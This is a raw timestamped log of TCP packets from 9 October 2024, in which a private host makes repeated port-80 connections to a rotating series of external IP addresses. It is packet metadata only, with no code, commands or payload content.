Oct 9, 2024 16:30:15.695055008 CEST	50002	80	192.168.2.5	84.32.84.32
Oct 9, 2024 16:30:15.700021029 CEST	80	50002	84.32.84.32	192.168.2.5
Oct 9, 2024 16:30:20.731159925 CEST	50003	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:20.736255884 CEST	80	50003	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:20.736428976 CEST	50003	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:20.759464979 CEST	50003	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:20.764437914 CEST	80	50003	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:21.681909084 CEST	80	50003	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:21.682663918 CEST	80	50003	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:21.682723045 CEST	50003	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:22.271420002 CEST	50003	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:23.290630102 CEST	50004	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:23.295744896 CEST	80	50004	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:23.295816898 CEST	50004	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:23.310446978 CEST	50004	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:23.315915108 CEST	80	50004	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:24.210056067 CEST	80	50004	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:24.210169077 CEST	80	50004	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:24.210298061 CEST	50004	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:24.818160057 CEST	50004	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:25.839427948 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:25.844393969 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:25.847635984 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:25.859383106 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:25.864290953 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:25.864300966 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:27.050699949 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:27.050757885 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:27.050817966 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:27.051301003 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:27.051337004 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:27.053740978 CEST	80	50005	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:27.053783894 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:27.365012884 CEST	50005	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:28.384516954 CEST	50006	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:28.389405012 CEST	80	50006	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:28.392785072 CEST	50006	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:28.399941921 CEST	50006	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:28.405240059 CEST	80	50006	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:29.292896032 CEST	80	50006	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:29.297128916 CEST	80	50006	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:29.297199011 CEST	50006	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:29.298480988 CEST	50006	80	192.168.2.5	47.57.185.227
Oct 9, 2024 16:30:29.303982019 CEST	80	50006	47.57.185.227	192.168.2.5
Oct 9, 2024 16:30:43.279119968 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.284015894 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.284094095 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.297208071 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.302522898 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889381886 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889413118 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889429092 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889444113 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889460087 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889475107 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889492035 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889508009 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889688015 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.889714003 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.890466928 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.890466928 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.891243935 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.895463943 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.895508051 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.895526886 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.896445990 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.976339102 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.976414919 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.976457119 CEST	80	50007	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:43.977291107 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:43.977291107 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:44.802613020 CEST	50007	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:45.822659969 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:45.828218937 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:45.834645987 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:45.848357916 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:45.853342056 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613779068 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613826036 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613877058 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613909006 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613941908 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.613976002 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.614084959 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.614084959 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.614348888 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.614382982 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.614414930 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.614557981 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.614804983 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.619048119 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.619083881 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.619117975 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.619184017 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.619496107 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.619589090 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.623429060 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:46.706276894 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.706327915 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.706367970 CEST	80	50008	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:46.706634045 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:47.349422932 CEST	50008	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.368541002 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.373884916 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.374181032 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.385113955 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.389995098 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.390065908 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999232054 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999254942 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999284983 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999299049 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999308109 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999315023 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999319077 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.999324083 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999337912 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999352932 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999375105 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:48.999416113 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:48.999439955 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:49.004749060 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.004770994 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.004787922 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.004812956 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:49.052459002 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:49.087627888 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.087650061 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.087687016 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:49.088217974 CEST	80	50009	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:49.088258028 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:49.896358013 CEST	50009	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:50.915853977 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:50.921082973 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:50.921169043 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:50.930421114 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:50.935471058 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514640093 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514666080 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514678001 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514709949 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514720917 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514733076 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514744997 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514755964 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514755964 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.514766932 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514779091 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.514851093 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.514870882 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.519681931 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.519742012 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.519814014 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.601475000 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.601494074 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.601617098 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.602224112 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:51.602271080 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.604929924 CEST	50010	80	192.168.2.5	162.0.213.94
Oct 9, 2024 16:30:51.610070944 CEST	80	50010	162.0.213.94	192.168.2.5
Oct 9, 2024 16:30:56.853418112 CEST	50011	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:56.858472109 CEST	80	50011	85.159.66.93	192.168.2.5
Oct 9, 2024 16:30:56.860677958 CEST	50011	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:56.873680115 CEST	50011	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:56.879071951 CEST	80	50011	85.159.66.93	192.168.2.5
Oct 9, 2024 16:30:58.380676031 CEST	50011	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:58.386240005 CEST	80	50011	85.159.66.93	192.168.2.5
Oct 9, 2024 16:30:58.388654947 CEST	50011	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:59.399339914 CEST	50012	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:59.404503107 CEST	80	50012	85.159.66.93	192.168.2.5
Oct 9, 2024 16:30:59.404577971 CEST	50012	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:59.415832996 CEST	50012	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:30:59.420739889 CEST	80	50012	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:00.927864075 CEST	50012	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:00.933624983 CEST	80	50012	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:00.933681965 CEST	50012	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:01.946152925 CEST	50013	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:01.951312065 CEST	80	50013	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:01.952802896 CEST	50013	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:01.965507030 CEST	50013	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:01.972548962 CEST	80	50013	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:01.972568989 CEST	80	50013	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:03.474435091 CEST	50013	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:03.480262041 CEST	80	50013	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:03.480328083 CEST	50013	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:04.495450974 CEST	50014	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:04.500663996 CEST	80	50014	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:04.504693985 CEST	50014	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:04.512209892 CEST	50014	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:04.517452955 CEST	80	50014	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:05.186007977 CEST	80	50014	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:05.186064959 CEST	80	50014	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:05.186160088 CEST	50014	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:05.189390898 CEST	50014	80	192.168.2.5	85.159.66.93
Oct 9, 2024 16:31:05.194351912 CEST	80	50014	85.159.66.93	192.168.2.5
Oct 9, 2024 16:31:10.236913919 CEST	50015	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:10.241908073 CEST	80	50015	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:10.242235899 CEST	50015	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:10.252571106 CEST	50015	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:10.257882118 CEST	80	50015	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:10.897483110 CEST	80	50015	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:10.897571087 CEST	80	50015	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:10.897628069 CEST	50015	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:11.755640030 CEST	50015	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:12.774725914 CEST	50016	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:12.779707909 CEST	80	50016	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:12.784691095 CEST	50016	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:12.796569109 CEST	50016	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:12.801609039 CEST	80	50016	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:13.437375069 CEST	80	50016	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:13.437503099 CEST	80	50016	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:13.437551022 CEST	50016	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:14.302664042 CEST	50016	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:15.322494030 CEST	50017	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:15.328397036 CEST	80	50017	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:15.328474998 CEST	50017	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:15.344554901 CEST	50017	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:15.349597931 CEST	80	50017	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:15.349647045 CEST	80	50017	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:16.064273119 CEST	80	50017	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:16.064305067 CEST	80	50017	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:16.064397097 CEST	50017	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:16.850085974 CEST	50017	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:17.871176958 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:17.876586914 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:17.880793095 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:17.895442009 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:18.115134954 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:18.168688059 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:18.168720961 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:18.542467117 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:18.542752028 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:18.543534994 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:18.547431946 CEST	50018	80	192.168.2.5	217.160.0.147
Oct 9, 2024 16:31:18.552334070 CEST	80	50018	217.160.0.147	192.168.2.5
Oct 9, 2024 16:31:31.655798912 CEST	50019	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:31.660835028 CEST	80	50019	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:31.660989046 CEST	50019	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:31.676281929 CEST	50019	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:31.681212902 CEST	80	50019	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:32.582340002 CEST	80	50019	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:32.582356930 CEST	80	50019	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:32.582681894 CEST	50019	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:33.177613974 CEST	50019	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:34.200603008 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:34.925473928 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:34.925554991 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:34.938709021 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:34.943984032 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:36.236040115 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:36.236052990 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:36.236059904 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:36.236188889 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:36.236274958 CEST	80	50020	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:36.240649939 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:36.444617987 CEST	50020	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:37.462620020 CEST	50021	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:37.467669010 CEST	80	50021	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:37.467741013 CEST	50021	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:37.483074903 CEST	50021	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:37.488003969 CEST	80	50021	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:37.488080025 CEST	80	50021	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:38.384784937 CEST	80	50021	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:38.386343956 CEST	80	50021	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:38.386595964 CEST	50021	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:38.990134954 CEST	50021	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.008694887 CEST	50022	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.013808012 CEST	80	50022	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:40.013936996 CEST	50022	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.022943974 CEST	50022	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.027779102 CEST	80	50022	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:40.913161993 CEST	80	50022	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:40.913197994 CEST	80	50022	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:40.913431883 CEST	50022	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.916953087 CEST	50022	80	192.168.2.5	154.23.184.218
Oct 9, 2024 16:31:40.923047066 CEST	80	50022	154.23.184.218	192.168.2.5
Oct 9, 2024 16:31:46.456713915 CEST	50023	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:46.461750031 CEST	80	50023	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:46.461886883 CEST	50023	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:46.474639893 CEST	50023	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:46.479856968 CEST	80	50023	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:47.976758957 CEST	50023	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:47.982429028 CEST	80	50023	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:47.987839937 CEST	50023	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:48.993580103 CEST	50024	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:49.144750118 CEST	80	50024	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:49.144834042 CEST	50024	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:49.160866022 CEST	50024	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:49.165797949 CEST	80	50024	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:50.682704926 CEST	50024	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:50.688296080 CEST	80	50024	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:50.695406914 CEST	50024	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:51.697046041 CEST	50025	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:52.016952991 CEST	80	50025	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:52.020720959 CEST	50025	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:52.032500029 CEST	50025	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:52.037468910 CEST	80	50025	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:52.037658930 CEST	80	50025	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:53.536928892 CEST	50025	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:53.542440891 CEST	80	50025	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:53.542495012 CEST	50025	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:54.555777073 CEST	50026	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:54.560702085 CEST	80	50026	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:54.564723969 CEST	50026	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:54.575402975 CEST	50026	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:54.580259085 CEST	80	50026	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:55.139703989 CEST	80	50026	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:55.139769077 CEST	80	50026	107.163.96.57	192.168.2.5
Oct 9, 2024 16:31:55.139869928 CEST	50026	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:55.143176079 CEST	50026	80	192.168.2.5	107.163.96.57
Oct 9, 2024 16:31:55.148194075 CEST	80	50026	107.163.96.57	192.168.2.5
Oct 9, 2024 16:32:01.399414062 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:01.404470921 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:01.404692888 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:01.417202950 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:01.422544956 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302668095 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302732944 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302767992 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302803040 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302834988 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302843094 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:02.302870035 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302902937 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:02.302902937 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302936077 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:02.302938938 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.302973986 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.303011894 CEST	80	50027	45.197.45.172	192.168.2.5
Oct 9, 2024 16:32:02.303088903 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:02.303088903 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:02.927541018 CEST	50027	80	192.168.2.5	45.197.45.172
Oct 9, 2024 16:32:03.951891899 CEST	50028	80	192.168.2.5	45.197.45.172
